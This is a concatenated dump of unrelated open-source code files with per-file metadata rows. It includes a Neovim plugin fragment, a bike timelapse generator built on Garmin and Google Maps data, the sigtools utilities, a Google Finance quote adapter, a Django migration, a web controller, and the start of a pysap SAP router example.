self.__chromatica.parse(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_delayed_parse")
def delayed_parse(self, context):
context["rpc"] = "chromatica_delayed_parse"
try:
self.__chromatica.delayed_parse(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_print_highlight")
def print_highlight(self, context):
context["rpc"] = "chromatica_print_highlight"
try:
self.__chromatica.print_highlight(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_clear_highlight")
def clear_highlight(self):
self.__chromatica.clear_highlight()
@pynvim.rpc_export("chromatica_show_info", sync=True)
def show_info(self, context):
self.__chromatica.show_info(context)
| mit | 3,550,181,417,143,118,000 | 30.272727 | 78 | 0.583472 | false | 3.541176 | false | false | false |
Pancia/loki-lang | tests/specials.out.py | 1 | 2823 | class Loki:
@staticmethod
def printf(x):
print(x)
@staticmethod
def plus(*args):
return reduce((lambda x, y : x + y), args)
@staticmethod
def minus(*args):
return reduce((lambda x, y : x - y), args)
@staticmethod
def div(*args):
return reduce((lambda x, y : x / y), args)
@staticmethod
def mult(*args):
return reduce((lambda x, y : x * y), args)
@staticmethod
def and_(*args):
return reduce((lambda x, y : x and y), args)
@staticmethod
def or_(*args):
return reduce((lambda x, y : x or y), args)
@staticmethod
def eq(*args):
return not not reduce((lambda x, y : x if x == y else False), args)
@staticmethod
def neq(*args):
return not Loki.eq(*args)
@staticmethod
def lt(*args):
return not not reduce((lambda x, y : y if x < y else False), args)
@staticmethod
def lte(*args):
return not not reduce((lambda x, y : y if x <= y else False), args)
@staticmethod
def gt(*args):
return not not reduce((lambda x, y : y if x > y else False), args)
@staticmethod
def gte(*args):
return not Loki.lt(*args)
@staticmethod
def mod(x, y):
return x % y
@staticmethod
def range(n):
return range(n)
@staticmethod
def get(e, i):
return e[i]
@staticmethod
def set(x, v):
x = v
@staticmethod
def assoc(x, i, v):
x[i] = v
return x
@staticmethod
def in_(x, l):
return (x in l)
@staticmethod
def sc(n, x, l):
return n[x:l]
@staticmethod
def dc(n, x, l):
return n[x::l]
@staticmethod
def dcm(n, x, m, l):
return n[x:m:l]
@staticmethod
def not_ (x):
return not x
#END LOKI HELPER FUNCTIONS
Loki.printf("TODO QUOTED")
Loki.printf("py")
(Loki.printf("print this!") if Loki.lt(1, 2) else Loki.printf("do not print this!"))
x = 5
(Loki.printf("this is wrong") if Loki.gt(x, 10) else Loki.printf("this is right"))
for x in Loki.range(3):
Loki.printf(x)
for x in Loki.range(3):
Loki.printf("x")
Loki.printf(x)
for y in Loki.range(3):
Loki.printf("y")
Loki.printf(y)
Loki.printf(x)
x = 7
Loki.printf(x)
class Rocket():
def __init__(self, x):
self.speed = x
color = "red"
fuel = 7
def lift_off (self):
return Loki.printf(Loki.plus("I'm flying @ ", (self.speed() if callable(self.speed) else self.speed), " speed"))
def toString (self):
return Loki.plus("I'm a ", (self.color() if callable(self.color) else self.color), " rocket")
r = Rocket(7)
Loki.printf((r.speed() if callable(r.speed) else r.speed))
r.speed = 10
Loki.printf((r.speed() if callable(r.speed) else r.speed)) | mit | -6,155,213,670,779,928,000 | 25.148148 | 120 | 0.560397 | false | 3.122788 | false | false | false |
rssenar/PyToolkit | ReMapAndMergeFiles.py | 1 | 2122 |
#!/usr/bin/env python3.4
# ---------------------------------------------------------------------------- #
import csv, os, glob
from Constants import *
from tqdm import tqdm
# ---------------------------------------------------------------------------- #
os.chdir('../../../../Desktop/')
CSVFiles = glob.glob('*.csv')
# ---------------------------------------------------------------------------- #
# Re-Map Column Fields
def ReMapHeaderFields():
for index in tqdm(range(0,len(CSVFiles))):
with open(CSVFiles[index],'rU') as InputFile,\
open('___ReMapped--' + str(CSVFiles[index]),'at') as OutputFile:
Input = csv.reader(InputFile)
Output = csv.writer(OutputFile)
Output.writerow(HeaderRowMain)
FirstLine = True
for line in tqdm(Input):
if FirstLine:
for IndexA in range(0,len(line)):
MatchHeaderFields(line[IndexA], IndexA)
FirstLine = False
else:
Newline = []
for IndexB in range(0,len(HeaderRowMain)):
if IndexB in HeaderDict:
Newline.append(eval(HeaderDict[IndexB]))
else:
Newline.append('')
Output.writerow(Newline)
def MultiFileMarge():
FirstFileUseHeaderRow = True
CSVFiles = glob.glob('___*.csv')
for line in tqdm(CSVFiles):
with open(line,'rU') as File,\
open('>>>> MERGED_FILE <<<<.csv','at') as Merge:
OutputClean = csv.writer(Merge)
Input = csv.reader(File)
if FirstFileUseHeaderRow:
for line in tqdm(Input):
OutputClean.writerow(line)
FirstFileUseHeaderRow = False
else:
next(File)
for line in tqdm(Input):
OutputClean.writerow(line)
# ---------------------------------------------------------------------------- #
if __name__ == '__main__':
print('=======================================')
print(' RE-MAP & MERGE ')
print('=======================================')
ReMapHeaderFields()
MultiFileMarge()
print('=======================================')
print(' COMPLETED ')
print()
| bsd-2-clause | 604,217,898,498,476,300 | 34.966102 | 80 | 0.45853 | false | 4.321792 | false | false | false |
rekab/biketl | biketl.py | 1 | 14700 | #!/usr/bin/python
"""Stitch together timelapse images with a Garmin track.
Draws graphs of Garmin data (speed, HR, cadence, elevation) along with a Google
map of position (updated every 10th of a mile). Google Maps has some very
aggressive rate limits, which means this script has to sleep _a lot_ and
frequently fail. Fortunately, files are staged, and it can pick up where it
left off.
Relies on the EXIF data from the timelapse files to match the track up with the
images.
Tested on Linux with a GoPro Hero3 and a Garmin Edge 500:
https://www.youtube.com/watch?v=Y1VTvU5xEFM
USAGE:
Do to Google Map's aggressive throttling it's best to put this in a loop.
while ! python biketl.py --fitfile=garmin_file.fit --imgsrcglob='images/gopro-source/*.JPG' --stagingdir=/tmp/temp-dir ; do sleep 5m ; done
"""
import argparse
import bisect
import datetime
import glob
import os
import sys
import tempfile
import time
import urllib2
ROOT = os.path.dirname(sys.argv[0])
sys.path.append(os.path.join(ROOT, 'python-fitparse'))
sys.path.append(os.path.join(ROOT, 'python-fitparse'))
sys.path.append(os.path.join(ROOT, 'motionless'))
sys.path.append(os.path.join(ROOT, 'exif-py'))
from fitparse import activity
from motionless import DecoratedMap, LatLonMarker
from matplotlib import pyplot
from matplotlib import font_manager
from matplotlib.pyplot import np
import EXIF
SEMICIRCLE_RATIO = 180.0/(2**31)
MS_TO_MPH_RATIO = 2.23694
METERS_TO_MILES_RATIO = 0.000621371
METERS_TO_FEET_RATIO = 3.28084
#FONT_PATH = '/home/james/code/biketl/zekton.otf'
NUM_GRAPH_POINTS=100
class ImagesAndPointsDoNotOverlap(RuntimeError):
pass
class NoImagesFound(RuntimeError):
pass
class NoGPSTrack(RuntimeError):
pass
def GetPointsFromActivity(filename):
print 'loading activity %s' % filename
a = activity.Activity(filename)
a.parse()
points = []
for record in a.get_records_by_type('record'):
points.append(Point(record))
return points
class PointList(object):
def __init__(self, fitfile):
self._points = GetPointsFromActivity(fitfile)
self._times = [point.time for point in self._points]
def __getitem__(self, index):
return self._points[index]
def __len__(self):
return len(self._points)
def GetIndexNearestTime(self, t):
if not self._points:
return None
left_index = bisect.bisect_left(self._times, t)
right_index = bisect.bisect_right(self._times, t)
left, right = None, None
if left_index >= len(self._points):
return len(self._points)
if right_index < len(self._points):
left = self._points[left_index]
right = self._points[right_index]
if (t - left.time) < (right.time - t):
return left_index
else:
return right_index
return left_index
def GetPointsNearestTime(self, t, num_points=50):
index = self.GetIndexNearestTime(t)
if index is None:
return None
return self._points[max(0, index - num_points):index+1]
class Point(object):
CONVERTER = {
'semicircles': SEMICIRCLE_RATIO,
'm/s': MS_TO_MPH_RATIO,
'm': METERS_TO_FEET_RATIO,
}
def __init__(self, record):
self._record = record
@property
def distance(self):
dist = self._record.get_data('distance')
if dist:
return dist * METERS_TO_MILES_RATIO
return 0
@property
def position(self):
return (self.position_lat, self.position_long)
@property
def temp_f(self):
return self.temperature * 9.0 / 5.0 + 32.0
def __getattr__(self, field_name):
data = self._record.get_data(field_name)
if data is None:
return 0
unit_ratio = self.CONVERTER.get(self._record.get_units(field_name), 1)
return data*unit_ratio
@property
def time(self):
return self._record.get_data('timestamp')
def __repr__(self):
return str(self)
def __str__(self):
return "Time: %s\nPos: %s\nSpeed: %s mph\nHR: %s bpm\nCAD: %s rpm\nAlt: %s feet\nGrade: %d%%\nDist: %s miles\nTemp: %s" % (
self.time.ctime(), self.position, self.speed, self.heart_rate,
self.cadence, self.altitutde, self.grade, self.distance, self.temperature)
class Image(object):
def __init__(self, filename, timeskew=0):
self.filename = filename
self.timeskew = timeskew
with open(filename, 'r') as f:
self._tags = EXIF.process_file(f)
@property
def time(self):
ts = str(self._tags['EXIF DateTimeOriginal'])
return (datetime.datetime.strptime(ts, '%Y:%m:%d %H:%M:%S') +
datetime.timedelta(0, self.timeskew, 0))
def GetImages(files, timeskew=0):
"""Load images.
Args:
files: list of filenames
timeskew: seconds to add to each EXIF timestamp
Returns:
list of Image objects, ordered by exif timestamp (ascending)
"""
print 'Loading and sorting exif data for %d image files...' % len(files)
return sorted([Image(f, timeskew=timeskew) for f in files], key=lambda i:i.time)
def GetMapForPoints(output_dir, file_basename, points, mapdelay=3):
# Map creation is expensive, so check if we've already fetched it.
map_image_fname = os.path.join(output_dir, 'map-%s.png' % file_basename)
latest = points[-1]
if os.path.exists(map_image_fname):
print 'map already exists for %s' % latest
return map_image_fname
print 'getting map for %s' % latest
gmap = DecoratedMap(size_x=200, size_y=200, pathweight=4, pathcolor='red')
gmap.add_marker(
LatLonMarker(*tuple(str(x) for x in points[-1].position), color='red'))
print 'sleeping %s seconds' % mapdelay
time.sleep(mapdelay)
resp = urllib2.urlopen(gmap.generate_url() + '&zoom=11')
f = open(map_image_fname, 'w')
f.write(resp.read())
f.close()
return map_image_fname
def DrawSpeedLabel(speed, ax):
if speed > 25:
font = font_manager.FontProperties(size=14,
weight='bold')
#fname=FONT_PATH)
else:
font = font_manager.FontProperties(size=14)
#fname=FONT_PATH)
desc = ('%.1f MPH' % speed).rjust(8)
# I dislike that pyplot is global, it impinges my customary design.
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
def DrawHeartRateLabel(hr, ax):
color = 'white'
if hr > 165:
desc = ('%d BPM' % hr).rjust(7)
font = font_manager.FontProperties(size=14, weight = 'bold')
#fname=FONT_PATH)
color = 'red'
else:
desc = 'Heart Rate (BPM)'
font = font_manager.FontProperties(size=14) #, fname=FONT_PATH)
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color=color)
def GetFontPropertiesForGrade(grade):
return font_manager.FontProperties(size=14)
#fname=FONT_PATH)
def GetFontPropertiesForCadence(cadence):
return font_manager.FontProperties(size=14)
#fname=FONT_PATH)
def GetPointForLabel(points):
"""Get a point every few seconds, so that numbers are readable."""
# TODO: find the last point at a minute boundary
return points[-1]
def GetLineGraphForPoints(output_dir, file_basename, points):
"""Draw a 1024x160 graph."""
latest = GetPointForLabel(points)
figure = pyplot.figure(latest.time.ctime(), figsize=(10.24, 1), dpi=80)
# TODO: merge speed with cad on the same graph. merge hr with elevation.
ax = pyplot.subplot(1,4,1, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.subplots_adjust(left=0.05, right=1, hspace=0, wspace=0.3)
pyplot.locator_params(nbins=4)
pyplot.ylim(0, 30)
pyplot.gca().get_xaxis().set_visible(False)
DrawSpeedLabel(latest.speed, ax)
pyplot.plot([point.speed for point in points], 'g-', linewidth=2)
ax = pyplot.subplot(1,4,2, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(90, 190)
DrawHeartRateLabel(latest.heart_rate, ax)
pyplot.plot([point.heart_rate for point in points], 'r-', linewidth=2)
ax = pyplot.subplot(1,4,3, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(0, 180)
#desc = ('%d RPM' % latest.cadence).rjust(7)
desc = 'Cadence (RPM)'
font = GetFontPropertiesForCadence(latest.cadence)
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
pyplot.plot([point.cadence for point in points], color='#ffff00', linewidth=2)
ax = pyplot.subplot(1,4,4, axisbg='black')
ax.tick_params(axis='y', colors='gray', labelsize=10)
pyplot.xlim(0, NUM_GRAPH_POINTS)
pyplot.locator_params(nbins=4)
pyplot.gca().get_xaxis().set_visible(False)
pyplot.ylim(0, 500) # STP max elevation is 500ft
# TODO: flash the value in bold whenever VAM is > some ft per min.
# e.g. crossing every 100 feet for the first time in a while.
#desc = ('%d feet' % latest.altitude).rjust(11)
desc = 'Elevation (Feet)'
font = GetFontPropertiesForGrade(latest.grade) # XXX: grade is always 0?
pyplot.text(0, .90, desc, transform=ax.transAxes, fontproperties=font, color='white')
pyplot.gca().get_xaxis().set_visible(False)
pyplot.plot([point.altitude for point in points], 'c-', linewidth=2)
graph_image_fname = os.path.join(output_dir, 'graph-%s.png' % file_basename)
print 'generating graph %s' % graph_image_fname
pyplot.savefig(graph_image_fname, facecolor='black')
return graph_image_fname
def Run(cmd_str, log=None):
if log:
print '%s:\n %s' % (log, cmd_str)
print 'composing picture and map: %s' % cmd_str
if os.system(cmd_str) != 0:
raise RuntimeError('command "%s" failed' % cmd_str)
def CompositeImages(pic_fname, gmap_fname, graph_fname, msg_bar_str, output_fname):
"""Assumes:
- 4:3 pic
- 300x300 map
- 1024x160 graph
- 1024x768 output
"""
# Resize the image down
tmpfile = '/tmp/img-and-map.png'
cmd_str = 'convert -scale 1024x768 %s %s' % (pic_fname, tmpfile)
Run(cmd_str, log='scaling image down')
# Composite the resized picture and the map
cmd_str = 'composite -geometry +797+0 -dissolve 80 %s %s %s' % (
gmap_fname, tmpfile, tmpfile)
Run(cmd_str, log='composing picture and map')
# Add status bar (mileage and time)
cmd_str = ('convert %s '
'-fill "#0008" '
'-draw "rectangle 0,630,1024,665" '
'-fill "#cccccc" '
#'-font %s '
'-pointsize 24 '
'-annotate +10+655 "%s" '
'%s') % (tmpfile, #FONT_PATH,
msg_bar_str, tmpfile)
Run(cmd_str, log='adding status bar (mileage and time)')
# Composite the tempfile with the graph
cmd_str = 'composite -geometry +0+665 -dissolve 50 %s %s %s' % (
graph_fname, tmpfile, output_fname)
Run(cmd_str, log='composing graph and prev composition')
def GetOutputImagePath(output_dir, pic_fname):
return os.path.join(output_dir, 'merged-%s' % os.path.basename(pic_fname))
def CheckImagesAndPointsOverlap(images, pointlist):
"""Verify that points exist for the camera's time, fail otherwise."""
if not len(images):
raise NoImagesFound()
if not len(pointlist):
raise NoGPSTrack('GPS track has 0 points.')
if images[-1].time < pointlist[0].time:
raise ImagesAndPointsDoNotOverlap('Last image occurs before first GPS point.')
if images[0].time > pointlist[-1].time:
raise ImagesAndPointsDoNotOverlap('First image occurs after last GPS point.')
def main():
parser = argparse.ArgumentParser(
description='Timelapse from Garmin bike records.')
parser.add_argument('--timeskew',
help='Add (or subtract) seconds from each EXIF timestamp.',
default=0)
parser.add_argument('--imgsrcglob', help='Image source glob pattern.',
default='/mnt/james/images/2013/gopro-flaming-geyser/*.JPG')
parser.add_argument('--stagingdir', help='Directory to stage files.',
default='/home/james/tmp/flaming-geyser-output')
parser.add_argument('--fitfile', help='Path to the source Garmin .fit file.',
default='/home/james/garmin/2013-06-22-07-05-20.fit')
parser.add_argument('--loop', help='Iterate over all files.', dest='loop',
action='store_true', default=True)
parser.add_argument('--noloop', help='Iterate over all files.', dest='loop',
action='store_false', default=False)
parser.add_argument('--mapdelay',
help='Number of seconds to sleep afer fetching a map.', default=5)
flags = parser.parse_args()
pointlist = PointList(flags.fitfile)
total_distance = pointlist[-1].distance
if not os.path.exists(flags.stagingdir):
print 'making %s' % flags.stagingdir
os.makedirs(flags.stagingdir)
images = GetImages(glob.glob(flags.imgsrcglob), flags.timeskew)
CheckImagesAndPointsOverlap(images, pointlist)
prev_point = None
map_image_fname = None
for image in images:
output_image_path = GetOutputImagePath(flags.stagingdir, image.filename)
# Check if we've already rendered an image based on this source image.
if os.path.exists(output_image_path):
print 'skipping %s' % image.filename
continue
print 'processing %s' % image.filename
# Get the previous N points
points = pointlist.GetPointsNearestTime(image.time, num_points=NUM_GRAPH_POINTS)
latest_point = points[-1]
# Get a graph
img_basename = os.path.basename(image.filename).replace('.JPG', '')
graph_image_fname = GetLineGraphForPoints(flags.stagingdir, img_basename, points)
# Map creation is expensive, so only get a new map if we've moved.
if (map_image_fname
and prev_point
and ('%.1f' % prev_point.distance) == ('%.1f' % latest_point.distance)):
print 'distance unchanged, using last map'
else:
# Get a map
map_image_fname = GetMapForPoints(flags.stagingdir, img_basename, points,
mapdelay=flags.mapdelay)
# Put them all together
elapsed_timedelta = latest_point.time - pointlist[0].time
elapsed_str = ':'.join(str(elapsed_timedelta).split(':')[:2])
msg_bar_str = 'Distance: %.1f miles (%.1f miles to go) Time: %s (%s elapsed) Temp: %dF' % (
latest_point.distance,
total_distance - latest_point.distance,
latest_point.time.strftime('%l:%M %P'),
elapsed_str,
latest_point.temp_f)
CompositeImages(image.filename, map_image_fname, graph_image_fname,
msg_bar_str, output_image_path)
prev_point = latest_point
if not flags.loop:
print 'exiting after one iteration'
sys.exit(0)
# make a movie:
# mencoder "mf://merged-*.JPG" -mf fps=12 -o output.avi -ovc lavc -lavcopts vcodec=mpeg4:mbd=2:trell:vbitrate=7000
if __name__ == '__main__':
main()
| mit | -3,330,803,630,378,907,000 | 31.666667 | 143 | 0.678367 | false | 3.159252 | true | false | false |
epsy/sigtools | sigtools/_util.py | 1 | 4504 | # sigtools - Collection of Python modules for manipulating function signatures
# Copyright (c) 2013-2015 Yann Kaiser
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import inspect
import ast
from functools import update_wrapper, partial
from weakref import WeakKeyDictionary
def get_funcsigs():
import inspect
try:
inspect.signature
except AttributeError:
import funcsigs
return funcsigs
else:
return inspect
funcsigs = get_funcsigs()
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
OrderedDict # quiet pyflakes
class _Unset(object):
__slots__ = ()
def __repr__(self):
return '<unset>'
UNSET = _Unset()
del _Unset
def noop(func):
return func
def qualname(obj):
try:
return obj.__qualname__
except AttributeError:
try:
return '{0.__module__}.{0.__name__}'.format(obj)
except AttributeError:
return repr(obj)
class OverrideableDataDesc(object):
def __init__(self, *args, **kwargs):
original = kwargs.pop('original', None)
if original is not None:
update_wrapper(self, original)
try:
self.custom_getter = kwargs.pop('get')
except KeyError:
def cg(func, **kwargs):
kwargs.update(self.parameters())
return type(self)(func, **kwargs)
self.custom_getter = cg
self.insts = WeakKeyDictionary()
super(OverrideableDataDesc, self).__init__(*args, **kwargs)
def __get__(self, instance, owner):
try:
getter = type(self.func).__get__
except AttributeError:
return self
else:
func = getter(self.func, instance, owner)
try:
return self.insts[func]
except KeyError:
pass
if func is self.func:
ret = self
else:
ret = self.custom_getter(func, original=self)
self.insts[func] = ret
return ret
def safe_get(obj, instance, owner):
try:
get = type(obj).__get__
except (AttributeError, KeyError):
return obj
return get(obj, instance, owner)
def iter_call(obj):
while True:
yield obj
try:
obj = obj.__call__
obj.__code__.co_filename
# raises if this is the __call__ method of a builtin object
except AttributeError:
return
partial_ = partial
partial_ = partial
def get_introspectable(obj, forged=True, af_hint=True, partial=True):
for obj in iter_call(obj):
try:
obj.__signature__
return obj
except AttributeError:
pass
if forged:
try:
obj._sigtools__forger
return obj
except AttributeError:
pass
if af_hint:
try:
obj._sigtools__autoforwards_hint
return obj
except AttributeError:
pass
if partial:
if isinstance(obj, partial_):
return obj
return obj
def get_ast(func):
try:
code = func.__code__
except AttributeError:
return None
try:
rawsource = inspect.getsource(code)
except (OSError, IOError):
return None
source = inspect.cleandoc('\n' + rawsource)
module = ast.parse(source)
return module.body[0]
| mit | -1,107,576,725,662,127,000 | 26.631902 | 79 | 0.613899 | false | 4.446199 | false | false | false |
philipodonnell/paperbroker | paperbroker/adapters/quotes/GoogleFinanceQuoteAdapter.py | 1 | 5613 | import arrow
from ...assets import asset_factory, Option
from ...quotes import OptionQuote, Quote
from .QuoteAdapter import QuoteAdapter
from googlefinance import getQuotes
"""
Get current prices from Google Finance
"""
class GoogleFinanceQuoteAdapter(QuoteAdapter):
def __init__(self):
self._cache = {}
def _set_cache(self, quote):
self._cache[quote.asset.symbol] = quote
return quote
def get_quote(self, asset):
asset = asset_factory(asset)
if self._cache.get(asset.symbol) is not None:
return self._cache.get(asset.symbol)
if isinstance(asset, Option):
options = self.get_options(asset.underlying, asset.expiration_date)
matches = [_ for _ in options if _.asset == asset]
if len(matches) == 0:
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
return matches[0]
else:
google_quotes = getQuotes(asset.symbol)
if google_quotes is None or len(google_quotes) == 0:
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
last_trade = google_quotes[0].get('LastTradeWithCurrency', None)
if last_trade is None or last_trade == '' or last_trade == '-':
raise Exception("GoogleFinanceAdapter.get_quote: No quote found for {}".format(asset.symbol))
return Quote(quote_date=arrow.now().format('YYYY-MM-DD'), asset=asset, bid=float(last_trade)-0.01, ask=float(last_trade)+0.01)
def get_expiration_dates(self, underlying_asset=None):
oc = OptionChain('NASDAQ:' + asset_factory(underlying_asset).symbol)
return sorted(list(set([asset_factory(_['s']).expiration_date for _ in (oc.calls + oc.puts)])))
def get_options(self, underlying_asset=None, expiration_date=None):
oc = OptionChain('NASDAQ:' + asset_factory(underlying_asset).symbol)
underlying_quote = self.get_quote(underlying_asset)
out = []
for option in (oc.calls + oc.puts):
if arrow.get(expiration_date).format('YYMMDD') in option['s']:
quote = OptionQuote(quote_date=arrow.now().format('YYYY-MM-DD'),
asset=option['s'],
bid=float(option['b']) if option['b'] != '-' else None,
ask=float(option['a']) if option['a'] != '-' else None,
underlying_price = underlying_quote.price)
self._set_cache(quote)
out.append(quote)
return out
# the code below is from https://github.com/makmac213/python-google-option-chain
import requests
OPTION_CHAIN_URL = 'https://www.google.com/finance/option_chain'
class OptionChain(object):
def __init__(self, q):
"""
Usage:
from optionchain import OptionChain
oc = OptionChain('NASDAQ:AAPL')
# oc.calls
# oc.puts
"""
params = {
'q': q,
'output': 'json'
}
data = self._get_content(OPTION_CHAIN_URL, params)
# get first calls and puts
calls = data['calls']
puts = data['puts']
for (ctr, exp) in enumerate(data['expirations']):
# we already got the first put and call
# skip first
if ctr:
params['expd'] = exp['d']
params['expm'] = exp['m']
params['expy'] = exp['y']
new_data = self._get_content(OPTION_CHAIN_URL, params)
if new_data.get('calls') is not None:
calls += new_data.get('calls')
if new_data.get('puts') is not None:
puts += new_data.get('puts')
self.calls = calls
self.puts = puts
def _get_content(self, url, params):
response = requests.get(url, params=params)
if response.status_code == 200:
content_json = response.content
data = json_decode(content_json)
return data
import json
import token, tokenize
from io import StringIO
# using below solution fixes the json output from google
# http://stackoverflow.com/questions/4033633/handling-lazy-json-in-python-expecting-property-name
def fixLazyJson (in_text):
tokengen = tokenize.generate_tokens(StringIO(in_text.decode('ascii')).readline)
result = []
for tokid, tokval, _, _, _ in tokengen:
# fix unquoted strings
if (tokid == token.NAME):
if tokval not in ['true', 'false', 'null', '-Infinity', 'Infinity', 'NaN']:
tokid = token.STRING
tokval = u'"%s"' % tokval
# fix single-quoted strings
elif (tokid == token.STRING):
if tokval.startswith ("'"):
tokval = u'"%s"' % tokval[1:-1].replace ('"', '\\"')
# remove invalid commas
elif (tokid == token.OP) and ((tokval == '}') or (tokval == ']')):
if (len(result) > 0) and (result[-1][1] == ','):
result.pop()
# fix single-quoted strings
elif (tokid == token.STRING):
if tokval.startswith ("'"):
tokval = u'"%s"' % tokval[1:-1].replace ('"', '\\"')
result.append((tokid, tokval))
return tokenize.untokenize(result)
def json_decode(json_string):
try:
ret = json.loads(json_string)
except:
json_string = fixLazyJson(json_string)
ret = json.loads(json_string)
return ret | mit | -8,827,368,968,645,760,000 | 30.897727 | 138 | 0.564582 | false | 3.908774 | false | false | false |
Lrcezimbra/subscriptions | subscriptions/core/migrations/0015_auto_20170920_0301.py | 1 | 1828 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-20 03:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0014_auto_20170624_0048'),
]
operations = [
migrations.AddField(
model_name='subscription',
name='paid',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='pago'),
),
migrations.AlterField(
model_name='column',
name='subscription_name',
field=models.CharField(choices=[('name', 'name'), ('email', 'email'), ('name_for_bib_number', 'name_for_bib_number'), ('gender', 'gender'), ('date_of_birth', 'date_of_birth'), ('city', 'city'), ('team', 'team'), ('shirt_size', 'shirt_size'), ('modality', 'modality'), ('ignore', 'ignore'), ('paid', 'paid')], max_length=20, verbose_name='coluna'),
),
migrations.AlterField(
model_name='modality',
name='modality',
field=models.CharField(choices=[('1', '1km'), ('2', '2km'), ('3', '3km'), ('4', '4km'), ('5', '5km'), ('6', '6km'), ('7', '7km'), ('8', '8km'), ('9', '9km'), ('10', '10km'), ('C', 'Caminhada'), ('I', 'Infantil'), ('J', 'Juvenil'), ('K', 'Kangoo'), ('Q', 'Quarteto')], max_length=2, verbose_name='modalidade'),
),
migrations.AlterField(
model_name='subscription',
name='modality',
field=models.CharField(choices=[('1', '1km'), ('2', '2km'), ('3', '3km'), ('4', '4km'), ('5', '5km'), ('6', '6km'), ('7', '7km'), ('8', '8km'), ('9', '9km'), ('10', '10km'), ('C', 'Caminhada'), ('I', 'Infantil'), ('J', 'Juvenil'), ('K', 'Kangoo'), ('Q', 'Quarteto')], max_length=2, verbose_name='modalidade'),
),
]
| gpl-3.0 | 3,345,637,479,954,481,700 | 51.228571 | 359 | 0.520788 | false | 3.184669 | false | false | false |
JoshAshby/Fla.gr | app/controllers/flags/delete.py | 1 | 1960 | #!/usr/bin/env python
"""
fla.gr controller for deleting flags
For more information, see: https://github.com/JoshAshby/
http://xkcd.com/353/
Josh Ashby
2013
http://joshashby.com
[email protected]
"""
from seshat.route import autoRoute
from utils.baseHTMLObject import baseHTMLObject
from views.flags.flagDelTmpl import flagDelTmpl
import models.couch.flag.flagModel as fm
import models.couch.flag.collections.userPublicFlagsCollection as pubfc
import models.couch.flag.collections.userFlagsCollection as fc
import utils.search.searchUtils as su
@autoRoute()
class flagsDelete(baseHTMLObject):
_title = "delete flag"
__login__ = True
def GET(self):
"""
"""
flagid = self.env["members"][0]
flag = fm.flagORM.getByID(flagid)
if flag.userID != self.session.id:
self.session.pushAlert("You can't delete a flag you don't own!", "Can't do that!", "error")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
return
view = flagDelTmpl(searchList=[self.tmplSearchList])
view.flag = flag
return view
def POST(self):
flagid = self.env["members"][0]
flag = fm.flagORM.getByID(flagid)
if flag.userID != self.session.id:
self.session.pushAlert("You can't delete a flag you don't own!", "Can't do that!", "error")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
return
pubFlags = pubfc.userPublicFlagsCollection(self.session.id)
privFlags = fc.userFlagsCollection(self.session.id)
if flag.visibility:
pubFlags.delObject(flag.id)
privFlags.delObject(flag.id)
flag.delete()
su.updateSearch()
self.session.pushAlert("Flag `%s` deleted" % flag.title, "Bye!", "warning")
self.head = ("303 SEE OTHER",
[("location", "/you/flags")])
| mit | -938,320,228,937,135,100 | 24.454545 | 103 | 0.62449 | false | 3.557169 | false | false | false |
CoreSecurity/pysap | examples/router_niping.py | 1 | 7348 | #!/usr/bin/env python2
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
#
# The library was designed and developed by Martin Gallo from
# the SecureAuth's Innovation Labs team.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# ==============
# Standard imports
import logging
from datetime import datetime
from argparse import ArgumentParser
from socket import socket, SHUT_RDWR, error as SocketError
# External imports
from scapy.packet import Raw
from scapy.config import conf
# Custom imports
import pysap
from pysap.SAPNI import SAPNIStreamSocket
from pysap.SAPRouter import SAPRoutedStreamSocket
# Set the verbosity to 0
conf.verb = 0
# Command line options parser
def parse_options():
description = "This script is an example implementation of SAP's niping utility."
usage = "%(prog)s [options] [mode] -H <remote host>"
